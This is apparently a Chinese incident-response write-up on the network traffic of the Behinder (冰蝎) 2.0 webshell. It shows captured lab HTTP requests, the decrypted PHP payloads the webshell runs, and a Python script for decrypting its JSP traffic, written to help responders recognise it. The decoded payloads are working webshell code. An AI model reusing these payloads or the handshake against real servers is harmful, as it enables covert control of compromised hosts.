开胃菜:冰蝎2.0流量分析

估计以后应急也遇不到2.0系列了 纪念一下

• 首先客户端以Get形式发起带密码的握手请求，服务端产生随机密钥并写入Session。

• 客户端将源代码，如assert|eval(“phpinfo();”)利用AES加密，发送至服务端，服务端收到之后先进行AES解密，得到中间结果字符串assert|eval(“phpinfo();”)。

• 服务端利用explode函数将拆分为一个字符串数据，索引为0的元素为字符串assert，索引为1的元素为字符串eval(“phpinfo();”)。

• 以可变函数方式调用索引为0的数组元素，参数为索引为1的数组元素，即为assert(“eval(”phpinfo;”)”

  
  

phpshell ：

流量：

GET /hackable/uploads/shell.php?pass=969 HTTP/1.1
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)
Host: 127.0.0.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 07:13:19 GMT
Server: Apache/2.4.25 (Debian)
Set-Cookie: PHPSESSID=u22ou8i880vqihp494171l8o52; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 16
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

c2b8bddd91e9f93c
GET /hackable/uploads/shell.php?pass=911 HTTP/1.1
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)
Host: 127.0.0.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 07:13:19 GMT
Server: Apache/2.4.25 (Debian)
Set-Cookie: PHPSESSID=omshj6ne2tb9vqbhbjmmp941a5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 16
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

35bcfe95469ff5cd

POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=omshj6ne2tb9vqbhbjmmp941a5; path=/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)
Cache-Control: no-cache
Pragma: no-cache
Host: 127.0.0.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 1112

32Pge7yPyCHLxiK4WAL9KkTysAtq1yS8Irn4ImJ8cAXfkwLMV6+9ohwUcfLQI+dVrWGHdv5vNINQpzAuA9MBU3DioakqKlRSVst/kW0kTWRGKaMaGQt/EKhYsDxkf6xZ4BRY5rtDYqgVnGB7e/AV/t/NwXfTTP0EkQx2Rdo3611hNURoRC3w0FzJHrbmMTkV4eDjqzROnY/IOKNeS4vjjaaDlC9TluNXHmTQQdNrdskc9dkaTvTS9qFjakqLNB/8mC00Xz0ytsyiqonjfTorDFN7tLPk6Sgbj9kS0vyysW5oBTvauENUpZzwK22NbVQvmopTopv4pRmzeguuAx8W51SoT2/FpLtNtOzsj8aFuzeO/CwBYWrrKbqGc9Fxmy8vOiOjsmdedkobm6sO/aoo4EeGI2GBgMD3tJxa7IvVjQK7gJssvZT6WZ6+S/x5S5m5vEfKG1FmTu4adGxY6LGoobOzXqatVnUebulg8j9uOKmuhV0YraEdcrkIbMd459jJWKe0n8t8AQjsPted2DYIUz1d9ISOB/Z3L5ylqB35hxwPBT6n1jqQ1eFiil1vr3LhxY/F25nS41+Yu+8ZT51UMyUOH20L/w1XDadhNpyESW4lzpZ2/Ovhq3qdluFUDfMEvTjV1VZuvYj8HVsKkn6ol4jmf5ZErDzimjktgqjHWqZ1biTAPLy8okNcqC6KI+qEytEjvuhXngwMqVy3QVEzOGtOV6IGHRkzzeP9p5vjyTj38WNrC5g0RLSJRoocxfmyPX/jExf0mmAFseN6VcPUUOYKF0xmw3jC20hGMBY9GauE0j1A/N0NlzB4HxqI/YIWIC24TWEgYabOAOEQYvMw6+mDK7K9f8FkTZMvSS3LR0JgkXmOmLqqRUhxgmnmpStyhTVNKDnvvm61tRjysm4IIkrFYv9s8eub4QrwIYXLOFeApMIF4NoMuTemqpF9pbd8OWHR15oJsMr09iet34LdwGSlgqplVNppKbiWfF04I7+o+2xysMlfQBRrOvaQJQ/IMsK1KysOb6Rr51nzuQpSuuFdLvjl7HjQi17yV8JfMuErSd+//0Tfd8R1wUPePThCtPeKJGN9N+412UY1k5Tj1A==

HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 07:13:19 GMT
Server: Apache/2.4.25 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 128
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

j19Cu6p/T0mge59Wp6FWJkVFt8/8Lox29kNbruaAl5Zao4ls3NtCboe105jOH7X9D33XtxJRkeHIvtu2JuSBpO7gY1h7LCHlZUuRH0Dsg8ukgIfRdbyutaiz0vAEjGhH

解密效果：

再对AES解密后的内容进行base64 decode

QGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIG1haW4oJGNvbnRlbnQpDQp7DQoJJHJlc3VsdCA9IGFycmF5KCk7DQoJJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKCRjb250ZW50KTsNCiAgICAka2V5ID0gJF9TRVNTSU9OWydrJ107DQogICAgZWNobyBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCRrZXkpOw0KfQ0KDQpmdW5jdGlvbiBlbmNyeXB0KCRkYXRhLCRrZXkpDQp7DQoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkNCiAgICAJew0KICAgIAkJZm9yKCRpPTA7JGk8c3RybGVuKCRkYXRhKTskaSsrKSB7DQogICAgCQkJICRkYXRhWyRpXSA9ICRkYXRhWyRpXV4ka2V5WyRpKzEmMTVdOyANCiAgICAJCQl9DQoJCQlyZXR1cm4gJGRhdGE7DQogICAgCX0NCiAgICBlbHNlDQogICAgCXsNCiAgICAJCXJldHVybiBvcGVuc3NsX2VuY3J5cHQoJGRhdGEsICJBRVMxMjgiLCAka2V5KTsNCiAgICAJfQ0KfSRjb250ZW50PSI2OGE0ZDQ0Ny1hZDgwLTQxZmUtODYzZi1iMmVmZTBiOTFmYjEiOw0KbWFpbigkY29udGVudCk7

base64 decode

@error_reporting(0);
function main($content)
{
	$result = array();
	$result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];
    echo encrypt(json_encode($result),$key);
}

function encrypt($data,$key)
{
	if(!extension_loaded('openssl'))
    	{
    		for($i=0;$i<strlen($data);$i++) {
    			 $data[$i] = $data[$i]^$key[$i+1&15]; 
    			}
			return $data;
    	}
    else
    	{
    		return openssl_encrypt($data, "AES128", $key);
    	}
}$content="68a4d447-ad80-41fe-863f-b2efe0b91fb1";
main($content);

冰蝎2的第一个AES加密请求为上述

第一个响应为

{"status":"c3VjY2Vzcw==","msg":"NjhhNGQ0NDctYWQ4MC00MWZlLTg2M2YtYjJlZmUwYjkxZmIx"}

c3VjY2Vzcw== 为success
NjhhNGQ0NDctYWQ4MC00MWZlLTg2M2YtYjJlZmUwYjkxZmIx 为68a4d447-ad80-41fe-863f-b2efe0b91fb1 与请求重的$centent 值相同

phpshell 的接下来请求为phpinfo的获取

error_reporting(0);
function main() {
    ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();
    $driveList ="";
    if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
    {
        for($i=65;$i<=90;$i++)
    	{
    		$drive=chr($i).':/';
    		file_exists($drive) ? $driveList=$driveList.$drive.";":'';
    	}
    }
	else
	{
		$driveList="/";
	}
    $currentPath=getcwd();
    //echo "phpinfo=".$info."n"."currentPath=".$currentPath."n"."driveList=".$driveList;
    $osInfo=PHP_OS;
    $result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo));
    //echo json_encode($result);
    session_start();
    $key=$_SESSION['k'];
    //echo json_encode($result);
    //echo openssl_encrypt(json_encode($result), "AES128", $key);
    echo encrypt(json_encode($result), $key);
}

function encrypt($data,$key)
{
	if(!extension_loaded('openssl'))
    	{
    		for($i=0;$i<strlen($data);$i++) {
    			 $data[$i] = $data[$i]^$key[$i+1&15]; 
    			}
			return $data;
    	}
    else
    	{
    		return openssl_encrypt($data, "AES128", $key);
    	}
}
main();

这个特征已经很明显

jspshell

jspshell 也采用AES形式进行加密

直接亮出解密代码

#coding:utf-8
import base64
from Crypto.Cipher import AES  
import binascii
import json   #注：python3 安装 Crypto 是 pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pycryptodome<br><br>
#解密
def aes_decode(data, key):
    try:
        aes = AES.new(str.encode(key), AES.MODE_ECB)  # 初始化加密器
        decrypted_text = aes.decrypt(data)  # 解密
        decrypted_text = decrypted_text[:-(decrypted_text[-1])]  # 去除多余补位
    except Exception as e:
        print(e)
    return decrypted_text
 

 
if __name__ == '__main__':
    key = 'bff6f68a478bdab2'  # 密钥长度必须为16、24或32位，分别对应AES-128、AES-192和AES-256
    data = "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"    # 待加密文本
    data=base64.b64decode(data)
    
    # mi = aes_encode(data,key)
    # print("加密值：",mi)
    # s=aes_decode(data,key)
    #print("解密值：",s)

    a = aes_decode(data,key)
    open('1.class','wb').write(a)
    


    s='2741e173494b544de828220430a1cc52486ae578ed5dbd24dcb04d15b6f4b8a5cfe50008698e14913bb761ce2224ac2dc536385598e3cb3d13282015982f23e8a6a61952b2609e37a1fcadda974f6d37a8d57b61e14dd5744d86895b2638c4de65f97f4a01239a213d1a610829c6744933eee95933162e6ad206022bbbfef443e5be9c2046874c87e6e8e8f9ec304ba252dd1a8cb54be99405eec7f238e4386a76e44f217af063d6b1c9afe2b5a46e9b6a6e616801508e2b6e9c0ee8afeb9ddd8b7e3b1f97c94b7cfe4b5b9d61bcb1877b76d6ceca8ed3f84577415e91b74f18b33fe3f041e46876701132b2bed68bdee08739f4f8eac660b6e23ec815016b63e90cb169cac482a18ebe1229a83d2f0c043fd3593b3a570b3a33ce5948680bbb85444dfccfb9453b3e43adeac2963a6407c67b468882d6c27c91666358807353f7da4d0f2af330184ed462cb178ffb920be6fbae025c47dab9ba36d681ad687030c322793843b8f64243e5a0709ba4d4702c84cf85186194b46804eb031db151c27bd96d8cee4d7e183629a158605f63b840cd7c7f1578bf9e40b6094f9275646e326b43fee888bf951a4ba07b5baf6bca631f7fbab47b02435dfc7011ec8717e045b25d6de8eaeac97490c0c73a1e7d666628fb2e449ccbc4c49c948fb07f82b4b08bb5a4a99bfb5c900da0c4903795b12e2d5143a4e811b10dde71240851ea8686c4e2a5becd6b7e2abf5d55c55ecf5614b26e4a5bbdf9fbdcdff695371b7c05086472d09fdff12d809fd2b9984f79e460290be7f02c7d37989bb16fcc753e5b7fef9da2e9f00c6a94c1c26965509f62f6168fe24e8206dca1bfcc72cee66980210dd54cea47154f65b8e79848ed50fa2c93e489a5528701cc6bbb34b755d6932b934db4dd2f3a90eb726b585a524143dbed3401838a8268a948676da7307d77200d4d17643851d96b4d0ba244465e15c451ae12c761e3bfc6e0297432cff2a9d99363491202836554befbce326936a4c42a2b8d0ecb2c3b039cfb3f223e1a2d94d66b30bf9b0b8381d915eaf4b0958d52c08d345a98ff57051d042db9895e8a92bc9ee097cfda93d40871bf4d06319a35b86f6fb51b1ead69ff1172597a03aa90aa6c921566a77b9408a39683966572aaa2e74e115958541fcba8ad76b325582a6e3af9ceb4772cf10ac9f0a28a4ac3a20e96c2cb7d2c036b06f39fe